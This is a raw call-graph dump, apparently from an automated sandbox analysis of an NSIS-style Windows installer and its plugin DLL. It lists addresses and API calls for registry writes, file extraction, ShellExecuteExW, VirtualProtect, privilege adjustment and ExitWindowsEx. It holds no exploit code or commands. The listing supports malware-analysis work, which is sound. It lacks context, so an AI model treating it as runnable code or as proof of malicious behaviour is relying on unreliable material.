5374->5369 5376 404b3a 5375->5376 5378 404cd5 20 API calls 5375->5378 5377 404b5d 5376->5377 5379 40140b 2 API calls 5376->5379 5392 404381 EnableWindow 5377->5392 5380 404b27 5378->5380 5379->5377 5382 404b3c SetDlgItemTextW 5380->5382 5383 404b2c 5380->5383 5382->5376 5384 404c0c 20 API calls 5383->5384 5384->5376 5385 404b79 5385->5336 5393 4047a9 5385->5393 5387->5333 5388->5357 5389->5342 5390->5359 5391->5368 5392->5385 5394 4047b7 5393->5394 5395 4047bc SendMessageW 5393->5395 5394->5395 5395->5336 5396 401b53 5397 402c41 17 API calls 5396->5397 5398 401b5a 5397->5398 5399 402c1f 17 API calls 5398->5399 5400 401b63 wsprintfW 5399->5400 5401 402ac5 5400->5401 5402 401956 5403 402c41 17 API calls 5402->5403 5404 40195d lstrlenW 5403->5404 5405 402592 5404->5405 5413 4014d7 5414 402c1f 17 API calls 5413->5414 5415 4014dd Sleep 5414->5415 5417 402ac5 5415->5417 5418 401f58 5419 402c41 17 API calls 5418->5419 5420 401f5f 5419->5420 5421 40672b 2 API calls 5420->5421 5422 401f65 5421->5422 5424 401f76 5422->5424 5425 40632f wsprintfW 5422->5425 5425->5424 5426 402259 5427 402c41 17 API calls 5426->5427 5428 40225f 5427->5428 5429 402c41 17 API calls 5428->5429 5430 402268 5429->5430 5431 402c41 17 API calls 5430->5431 5432 402271 5431->5432 5433 40672b 2 API calls 5432->5433 5434 40227a 5433->5434 5435 40228b lstrlenW lstrlenW 5434->5435 5439 40227e 5434->5439 5436 405450 24 API calls 5435->5436 5438 4022c9 SHFileOperationW 5436->5438 5437 405450 24 API calls 5440 402286 5437->5440 5438->5439 5438->5440 5439->5437 5265 70092993 5266 700929e3 5265->5266 5267 700929a3 VirtualProtect 5265->5267 5267->5266 5282 40175c 5283 402c41 17 API calls 5282->5283 5284 401763 5283->5284 5285 405f0d 2 API calls 5284->5285 5286 40176a 5285->5286 5287 405f0d 2 API calls 5286->5287 5287->5286 5441 401d5d GetDlgItem GetClientRect 5442 402c41 17 API calls 5441->5442 5443 401d8f LoadImageW SendMessageW 5442->5443 5444 402ac5 5443->5444 5445 401dad DeleteObject 5443->5445 5445->5444 5446 4022dd 5447 4022f7 5446->5447 5448 4022e4 5446->5448 5449 40640a 17 API calls 5448->5449 5450 4022f1 5449->5450 5451 405a4e MessageBoxIndirectW 5450->5451 5451->5447 5452 401563 5453 402a6b 5452->5453 5456 40632f wsprintfW 5453->5456 5455 402a70 5456->5455 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 402438 4450 402444 4445->4450 4459 402c1f 4445->4459 4446 40288b 4447 402c41 17 API calls 4451 40242e lstrlenW 4447->4451 4449 402463 RegSetValueExW 4453 402479 RegCloseKey 4449->4453 4450->4449 4462 4031d6 4450->4462 4451->4445 4453->4446 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4450 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 40329e 4467->4449 4468 405f61 ReadFile 4469 403221 4468->4469 4469->4467 4470 4032de 42 API calls 4469->4470 4471 403238 4470->4471 4471->4467 4472 4032a4 ReadFile 4471->4472 4474 403247 4471->4474 4472->4467 4474->4467 4475 405f61 ReadFile 4474->4475 4476 405f90 WriteFile 4474->4476 4475->4474 4476->4474 4478 406292 4477->4478 4479 40629d RegCreateKeyExW 4478->4479 4480 402410 4478->4480 4479->4480 4480->4445 4480->4446 4480->4447 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4468 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4513 402ed5 4510->4513 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4513->4514 4515 402edd 4513->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5457 4071e5 5460 406976 5457->5460 5458 406a00 GlobalAlloc 5458->5460 5461 4072e1 5458->5461 5459 4069f7 GlobalFree 5459->5458 5460->5458 5460->5459 5460->5460 5460->5461 5462 406a77 GlobalAlloc 5460->5462 5463 406a6e GlobalFree 5460->5463 5462->5460 5462->5461 5463->5462 5464 402868 5465 402c41 17 API calls 5464->5465 5466 40286f FindFirstFileW 5465->5466 5467 402897 5466->5467 5471 402882 5466->5471 5472 40632f wsprintfW 5467->5472 5469 4028a0 5473 4063e8 lstrcpynW 5469->5473 5472->5469 5473->5471 5474 401968 5475 402c1f 17 API calls 5474->5475 5476 40196f 5475->5476 5477 402c1f 17 API calls 5476->5477 5478 40197c 5477->5478 5479 402c41 17 API calls 5478->5479 5480 401993 lstrlenW 5479->5480 5482 4019a4 5480->5482 5481 4019e5 5482->5481 5486 4063e8 lstrcpynW 5482->5486 5484 4019d5 5484->5481 5485 4019da lstrlenW 5484->5485 5485->5481 5486->5484 5487 40166a 5488 402c41 17 API calls 5487->5488 5489 401670 5488->5489 5490 40672b 2 API calls 5489->5490 5491 401676 5490->5491 5012 40176f 5013 402c41 17 API calls 5012->5013 5014 401776 5013->5014 5015 401796 5014->5015 5016 40179e 5014->5016 5052 4063e8 lstrcpynW 5015->5052 5053 4063e8 lstrcpynW 5016->5053 5019 40179c 5023 40667c 5 API calls 5019->5023 5020 4017a9 5021 405cbd 3 API calls 5020->5021 5022 4017af lstrcatW 5021->5022 5022->5019 5029 4017bb 5023->5029 5024 40672b 2 API calls 5024->5029 5025 4017f7 5026 405eb9 2 API calls 5025->5026 5026->5029 5028 4017cd CompareFileTime 5028->5029 5029->5024 5029->5025 5029->5028 5030 40188d 5029->5030 5032 4063e8 lstrcpynW 5029->5032 5038 40640a 17 API calls 5029->5038 5046 405a4e MessageBoxIndirectW 5029->5046 5049 401864 5029->5049 5051 405ede GetFileAttributesW CreateFileW 5029->5051 5031 405450 24 API calls 5030->5031 5033 401897 5031->5033 5032->5029 5035 4031d6 44 API calls 5033->5035 5034 405450 24 API calls 5050 401879 5034->5050 5036 4018aa 5035->5036 5037 4018be SetFileTime 5036->5037 5039 4018d0 CloseHandle 5036->5039 5037->5039 5038->5029 5040 4018e1 5039->5040 5039->5050 5041 4018e6 5040->5041 5042 4018f9 5040->5042 5044 40640a 17 API calls 5041->5044 5043 40640a 17 API calls 5042->5043 5045 401901 5043->5045 5047 4018ee lstrcatW 5044->5047 5048 405a4e MessageBoxIndirectW 5045->5048 5046->5029 5047->5045 5048->5050 5049->5034 5049->5050 5051->5029 5052->5019 5053->5020 5054 4027ef 5055 4027f6 5054->5055 5061 402a70 5054->5061 5056 402c1f 17 API calls 5055->5056 5057 4027fd 5056->5057 5058 40280c SetFilePointer 5057->5058 5059 40281c 5058->5059 5058->5061 5062 40632f wsprintfW 5059->5062 5062->5061 5492 401a72 5493 402c1f 17 API calls 5492->5493 5494 401a7b 5493->5494 5495 402c1f 17 API calls 5494->5495 5496 401a20 5495->5496 5497 406af2 5501 406976 5497->5501 5498 4072e1 5499 406a00 GlobalAlloc 5499->5498 5499->5501 5500 4069f7 GlobalFree 5500->5499 5501->5498 5501->5499 5501->5500 5502 406a77 GlobalAlloc 5501->5502 5503 406a6e GlobalFree 5501->5503 5502->5498 5502->5501 5503->5502 5504 401573 5505 401583 ShowWindow 5504->5505 5506 40158c 5504->5506 5505->5506 5507 40159a ShowWindow 5506->5507 5508 402ac5 5506->5508 5507->5508 5509 401cf3 5510 402c1f 17 API calls 5509->5510 5511 401cf9 IsWindow 5510->5511 5512 401a20 5511->5512 5513 402df3 5514 402e05 SetTimer 5513->5514 5515 402e1e 5513->5515 5514->5515 5516 402e6c 5515->5516 5517 402e72 MulDiv 5515->5517 5518 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5517->5518 5518->5516 5520 7009103d 5521 7009101b 5 API calls 5520->5521 5522 70091056 5521->5522 5523 4014f5 SetForegroundWindow 5524 402ac5 5523->5524 5525 402576 5526 402c41 17 API calls 5525->5526 5527 40257d 5526->5527 5530 405ede GetFileAttributesW CreateFileW 5527->5530 5529 402589 5530->5529 5531 401b77 5532 401bc8 5531->5532 5534 401b84 5531->5534 5533 401bf2 GlobalAlloc 5532->5533 5536 401bcd 5532->5536 5537 40640a 17 API calls 5533->5537 5540 401c0d 5534->5540 5541 401b9b 5534->5541 5535 40640a 17 API calls 5538 4022f1 5535->5538 5545 4022f7 5536->5545 5552 4063e8 lstrcpynW 5536->5552 5537->5540 5544 405a4e MessageBoxIndirectW 5538->5544 5540->5535 5540->5545 5550 4063e8 lstrcpynW 5541->5550 5542 401bdf GlobalFree 5542->5545 5544->5545 5546 401baa 5551 4063e8 lstrcpynW 5546->5551 5548 401bb9 5553 4063e8 lstrcpynW 5548->5553 5550->5546 5551->5548 5552->5542 5553->5545 5254 4024f8 5255 402c81 17 API calls 5254->5255 5256 402502 5255->5256 5257 402c1f 17 API calls 5256->5257 5258 40250b 5257->5258 5259 402533 RegEnumValueW 5258->5259 5260 402527 RegEnumKeyW 5258->5260 5261 40288b 5258->5261 5262 40254f RegCloseKey 5259->5262 5263 402548 5259->5263 5260->5262 5262->5261 5263->5262 5268 40167b 5269 402c41 17 API calls 5268->5269 5270 401682 5269->5270 5271 402c41 17 API calls 5270->5271 5272 40168b 5271->5272 5273 402c41 17 API calls 5272->5273 5274 401694 MoveFileW 5273->5274 5275 4016a0 5274->5275 5276 4016a7 5274->5276 5277 401423 24 API calls 5275->5277 5278 40672b 2 API calls 5276->5278 5280 402250 5276->5280 5277->5280 5279 4016b6 5278->5279 5279->5280 5281 4061ae 36 API calls 5279->5281 5281->5275 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5576 40288b 5573->5576 5579 406873 WaitForSingleObject 5573->5579 5575 401f01 CloseHandle 5575->5576 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5575 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 401503 5604 40150b 5603->5604 5606 40151e 5603->5606 5605 402c1f 17 API calls 5604->5605 5605->5606 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4536 40288b 4531->4536 4533 4024c8 RegCloseKey 4532->4533 4534 4024c2 4532->4534 4533->4536 4534->4533 4543 40632f wsprintfW 4534->4543 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4533 5607 402104 5608 402c41 17 API calls 5607->5608 5609 40210b 5608->5609 5610 402c41 17 API calls 5609->5610 5611 402115 5610->5611 5612 402c41 17 API calls 5611->5612 5613 40211f 5612->5613 5614 402c41 17 API calls 5613->5614 5615 402129 5614->5615 5616 402c41 17 API calls 5615->5616 5618 402133 5616->5618 5617 402172 CoCreateInstance 5622 402191 5617->5622 5618->5617 5619 402c41 17 API calls 5618->5619 5619->5617 5620 401423 24 API calls 5621 402250 5620->5621 5622->5620 5622->5621 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4791 403fea GetDlgItem GetDlgItem 4788->4791 4809 40402a 4788->4809 4789->4788 4790 403eaa 4789->4790 4792 403eb5 SetWindowPos 4790->4792 4793 403ec8 4790->4793 4794 40435f 18 API calls 4791->4794 4792->4793 4797 403ee5 4793->4797 4798 403ecd ShowWindow 4793->4798 4799 404014 SetClassLongW 4794->4799 4795 404084 4796 4043ab SendMessageW 4795->4796 4801 403fd4 4795->4801 4825 404096 4796->4825 4802 403f07 4797->4802 4803 403eed DestroyWindow 4797->4803 4798->4797 4804 40140b 2 API calls 4799->4804 4800 401389 2 API calls 4807 40405c 4800->4807 4805 403f0c SetWindowLongW 4802->4805 4806 403f1d 4802->4806 4808 404309 4803->4808 4804->4809 4805->4801 4810 403fc6 4806->4810 4811 403f29 GetDlgItem 4806->4811 4807->4795 4812 404060 SendMessageW 4807->4812 4808->4801 4818 404319 ShowWindow 4808->4818 4809->4795 4809->4800 4868 4043c6 4810->4868 4815 403f59 4811->4815 4816 403f3c SendMessageW IsWindowEnabled 4811->4816 4812->4801 4813 40140b 2 API calls 4813->4825 4814 4042ea DestroyWindow EndDialog 4814->4808 4820 403f66 4815->4820 4822 403fad SendMessageW 4815->4822 4823 403f79 4815->4823 4832 403f5e 4815->4832 4816->4801 4816->4815 4818->4801 4819 40640a 17 API calls 4819->4825 4820->4822 4820->4832 4822->4810 4826 403f81 4823->4826 4827 403f96 4823->4827 4824 403f94 4824->4810 4825->4801 4825->4813 4825->4814 4825->4819 4828 40435f 18 API calls 4825->4828 4849 40422a DestroyWindow 4825->4849 4859 40435f 4825->4859 4830 40140b 2 API calls 4826->4830 4829 40140b 2 API calls 4827->4829 4828->4825 4831 403f9d 4829->4831 4830->4832 4831->4810 4831->4832 4865 404338 4832->4865 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4825 4849->4808 4850 404244 CreateDialogParamW 4849->4850 4850->4808 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4801 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4808 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4824 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4801 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5623 401f06 5624 402c41 17 API calls 5623->5624 5625 401f0c 5624->5625 5626 405450 24 API calls 5625->5626 5627 401f16 5626->5627 5628 4059d1 2 API calls 5627->5628 5629 401f1c 5628->5629 5630 401f3f CloseHandle 5629->5630 5631 406873 5 API calls 5629->5631 5634 40288b 5629->5634 5630->5634 5633 401f31 5631->5633 5633->5630 5636 40632f wsprintfW 5633->5636 5636->5630 5637 404809 5638 404819 5637->5638 5639 40483f 5637->5639 5640 40435f 18 API calls 5638->5640 5641 4043c6 8 API calls 5639->5641 5642 404826 SetDlgItemTextW 5640->5642 5643 40484b 5641->5643 5642->5639 5644 40190c 5645 401943 5644->5645 5646 402c41 17 API calls 5645->5646 5647 401948 5646->5647 5648 405afa 67 API calls 5647->5648 5649 401951 5648->5649 5650 40230c 5651 402314 5650->5651 5652 40231a 5650->5652 5653 402c41 17 API calls 5651->5653 5654 402c41 17 API calls 5652->5654 5656 402328 5652->5656 5653->5652 5654->5656 5655 402336 5657 402c41 17 API calls 5655->5657 5656->5655 5658 402c41 17 API calls 5656->5658 5659 40233f WritePrivateProfileStringW 5657->5659 5658->5655 5660 401f8c 5661 402c41 17 API calls 5660->5661 5662 401f93 5661->5662 5663 4067c2 5 API calls 5662->5663 5664 401fa2 5663->5664 5665 401fbe GlobalAlloc 5664->5665 5668 402026 5664->5668 5666 401fd2 5665->5666 5665->5668 5667 4067c2 5 API calls 5666->5667 5669 401fd9 5667->5669 5670 4067c2 5 API calls 5669->5670 5671 401fe3 5670->5671 5671->5668 5675 40632f wsprintfW 5671->5675 5673 402018 5676 40632f wsprintfW 5673->5676 5675->5673 5676->5668 4983 40238e 4984 4023c1 4983->4984 4985 402396 4983->4985 4987 402c41 17 API calls 4984->4987 4986 402c81 17 API calls 4985->4986 4988 40239d 4986->4988 4989 4023c8 4987->4989 4990 4023a7 4988->4990 4992 4023d5 4988->4992 4995 402cff 4989->4995 4993 402c41 17 API calls 4990->4993 4994 4023ae RegDeleteValueW RegCloseKey 4993->4994 4994->4992 4996 402d13 4995->4996 4997 402d0c 4995->4997 4996->4997 4999 402d44 4996->4999 4997->4992 5000 406255 RegOpenKeyExW 4999->5000 5001 402d72 5000->5001 5002 402dec 5001->5002 5006 402d76 5001->5006 5002->4997 5003 402d98 RegEnumKeyW 5004 402daf RegCloseKey 5003->5004 5003->5006 5007 4067c2 5 API calls 5004->5007 5005 402dd0 RegCloseKey 5005->5002 5006->5003 5006->5004 5006->5005 5008 402d44 6 API calls 5006->5008 5009 402dbf 5007->5009 5008->5006 5010 402de0 RegDeleteKeyW 5009->5010 5011 402dc3 5009->5011 5010->5002 5011->5002 5677 40190f 5678 402c41 17 API calls 5677->5678 5679 401916 5678->5679 5680 405a4e MessageBoxIndirectW 5679->5680 5681 40191f 5680->5681 5682 40558f 5683 4055b0 GetDlgItem GetDlgItem GetDlgItem 5682->5683 5684 405739 5682->5684 5727 404394 SendMessageW 5683->5727 5686 405742 GetDlgItem CreateThread CloseHandle 5684->5686 5687 40576a 5684->5687 5686->5687 5689 405795 5687->5689 5691 405781 ShowWindow ShowWindow 5687->5691 5692 4057ba 5687->5692 5688 405620 5697 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5688->5697 5690 4057f5 5689->5690 5694 4057a9 5689->5694 5695 4057cf ShowWindow 5689->5695 5690->5692 5704 405803 SendMessageW 5690->5704 5729 404394 SendMessageW 5691->5729 5696 4043c6 8 API calls 5692->5696 5698 404338 SendMessageW 5694->5698 5700 4057e1 5695->5700 5701 4057ef 5695->5701 5699 4057c8 5696->5699 5702 405695 5697->5702 5703 405679 SendMessageW SendMessageW 5697->5703 5698->5692 5708 405450 24 API calls 5700->5708 5709 404338 SendMessageW 5701->5709 5705 4056a8 5702->5705 5706 40569a SendMessageW 5702->5706 5703->5702 5704->5699 5707 40581c CreatePopupMenu 5704->5707 5711 40435f 18 API calls 5705->5711 5706->5705 5710 40640a 17 API calls 5707->5710 5708->5701 5709->5690 5712 40582c AppendMenuW 5710->5712 5713 4056b8 5711->5713 5714 405849 GetWindowRect 5712->5714 5715 40585c TrackPopupMenu 5712->5715 5716 4056c1 ShowWindow 5713->5716 5717 4056f5 GetDlgItem SendMessageW 5713->5717 5714->5715 5715->5699 5718 405877 5715->5718 5719 4056e4 5716->5719 5720 4056d7 ShowWindow 5716->5720 5717->5699 5721 40571c SendMessageW SendMessageW 5717->5721 5722 405893 SendMessageW 5718->5722 5728 404394 SendMessageW 5719->5728 5720->5719 5721->5699 5722->5722 5723 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5722->5723 5725 4058d5 SendMessageW 5723->5725 5725->5725 5726 4058fe GlobalUnlock SetClipboardData CloseClipboard 5725->5726 5726->5699 5727->5688 5728->5717 5729->5689 5730 700918d9 5731 700918fc 5730->5731 5732 70091931 GlobalFree 5731->5732 5733 70091943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5731->5733 5732->5733 5734 70091272 2 API calls 5733->5734 5735 70091ace GlobalFree GlobalFree 5734->5735 5736 70091058 5738 70091074 5736->5738 5737 700910dd 5738->5737 5739 70091516 GlobalFree 5738->5739 5740 70091092 5738->5740 5739->5740 5741 70091516 GlobalFree 5740->5741 5742 700910a2 5741->5742 5743 700910a9 GlobalSize 5742->5743 5744 700910b2 5742->5744 5743->5744 5745 700910c7 5744->5745 5746 700910b6 GlobalAlloc 5744->5746 5748 700910d2 GlobalFree 5745->5748 5747 7009153d 3 API calls 5746->5747 5747->5745 5748->5737 5749 401491 5750 405450 24 API calls 5749->5750 5751 401498 5750->5751 5759 401d14 5760 402c1f 17 API calls 5759->5760 5761 401d1b 5760->5761 5762 402c1f 17 API calls 5761->5762 5763 401d27 GetDlgItem 5762->5763 5764 402592 5763->5764 5765 404495 lstrcpynW lstrlenW 5766 403a96 5767 403aa1 5766->5767 5768 403aa5 5767->5768 5769 403aa8 GlobalAlloc 5767->5769 5769->5768 5770 402598 5771 4025c7 5770->5771 5772 4025ac 5770->5772 5774 4025fb 5771->5774 5775 4025cc 5771->5775 5773 402c1f 17 API calls 5772->5773 5782 4025b3 5773->5782 5777 402c41 17 API calls 5774->5777 5776 402c41 17 API calls 5775->5776 5778 4025d3 WideCharToMultiByte lstrlenA 5776->5778 5779 402602 lstrlenW 5777->5779 5778->5782 5779->5782 5780 40262f 5781 402645 5780->5781 5783 405f90 WriteFile 5780->5783 5782->5780 5782->5781 5784 405fbf 5 API calls 5782->5784 5783->5781 5784->5780 5785 700916d4 5786 70091703 5785->5786 5787 70091b5f 22 API calls 5786->5787 5788 7009170a 5787->5788 5789 7009171d 5788->5789 5790 70091711 5788->5790 5792 70091744 5789->5792 5793 70091727 5789->5793 5791 70091272 2 API calls 5790->5791 5796 7009171b 5791->5796 5794 7009174a 5792->5794 5795 7009176e 5792->5795 5797 7009153d 3 API calls 5793->5797 5798 700915b4 3 API calls 5794->5798 5799 7009153d 3 API calls 5795->5799 5800 7009172c 5797->5800 5802 7009174f 5798->5802 5799->5796 5801 700915b4 3 API calls 5800->5801 5803 70091732 5801->5803 5804 70091272 2 API calls 5802->5804 5805 70091272 2 API calls 5803->5805 5806 70091755 GlobalFree 5804->5806 5807 70091738 GlobalFree 5805->5807 5806->5796 5808 70091769 GlobalFree 5806->5808 5807->5796 5808->5796 5809 70092c57 5810 70092c6f 5809->5810 5811 7009158f 2 API calls 5810->5811 5812 70092c8a 5811->5812 5813 40451e 5814 404536 5813->5814 5820 404650 5813->5820 5821 40435f 18 API calls 5814->5821 5815 4046ba 5816 404784 5815->5816 5817 4046c4 GetDlgItem 5815->5817 5822 4043c6 8 API calls 5816->5822 5818 404745 5817->5818 5819 4046de 5817->5819 5818->5816 5826 404757 5818->5826 5819->5818 5825 404704 SendMessageW LoadCursorW SetCursor 5819->5825 5820->5815 5820->5816 5823 40468b GetDlgItem SendMessageW 5820->5823 5824 40459d 5821->5824 5837 40477f 5822->5837 5846 404381 EnableWindow 5823->5846 5828 40435f 18 API calls 5824->5828 5847 4047cd 5825->5847 5831 40476d 5826->5831 5832 40475d SendMessageW 5826->5832 5829 4045aa CheckDlgButton 5828->5829 5844 404381 EnableWindow 5829->5844 5836 404773 SendMessageW 5831->5836 5831->5837 5832->5831 5833 4046b5 5838 4047a9 SendMessageW 5833->5838 5836->5837 5838->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5837 5843->5842 5844->5839 5845->5841 5846->5833 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5818 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 5887 7009166d 5888 70091516 GlobalFree 5887->5888 5890 70091685 5888->5890 5889 700916cb GlobalFree 5890->5889 5891 700916a0 5890->5891 5892 700916b7 VirtualFree 5890->5892 5891->5889 5892->5889 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4571 4035c6 4563->4571 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4572 403474 12 API calls 4567->4572 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4569 405cea CharNextW 4569->4571 4571->4569 4576 4036c2 4571->4576 4578 4036c0 4571->4578 4574 40370f 4572->4574 4573 40375d 4579 403800 4573->4579 4583 405cea CharNextW 4573->4583 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4577 403474 12 API calls 4575->4577 4732 4063e8 lstrcpynW 4576->4732 4581 403741 4577->4581 4578->4564 4676 403ad8 4579->4676 4581->4568 4581->4629 4600 40377c 4583->4600 4586 40394a 4588 403952 GetCurrentProcess OpenProcessToken 4586->4588 4589 4039ce ExitProcess 4586->4589 4587 40382a 4744 405a4e 4587->4744 4594 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4588->4594 4595 40399e 4588->4595 4591 403840 4598 4059b9 5 API calls 4591->4598 4592 4037da 4597 405dc5 18 API calls 4592->4597 4594->4595 4599 4067c2 5 API calls 4595->4599 4601 4037e6 4597->4601 4602 403845 lstrcatW 4598->4602 4603 4039a5 4599->4603 4600->4591 4600->4592 4601->4629 4733 4063e8 lstrcpynW 4601->4733 4604 403861 lstrcatW lstrcmpiW 4602->4604 4605 403856 lstrcatW 4602->4605 4606 4039ba ExitWindowsEx 4603->4606 4609 4039c7 4603->4609 4608 40387d 4604->4608 4604->4629 4605->4604 4606->4589 4606->4609 4611 403882 4608->4611 4612 403889 4608->4612 4613 40140b 2 API calls 4609->4613 4610 4037f5 4734 4063e8 lstrcpynW 4610->4734 4615 40591f 4 API calls 4611->4615 4616 40599c 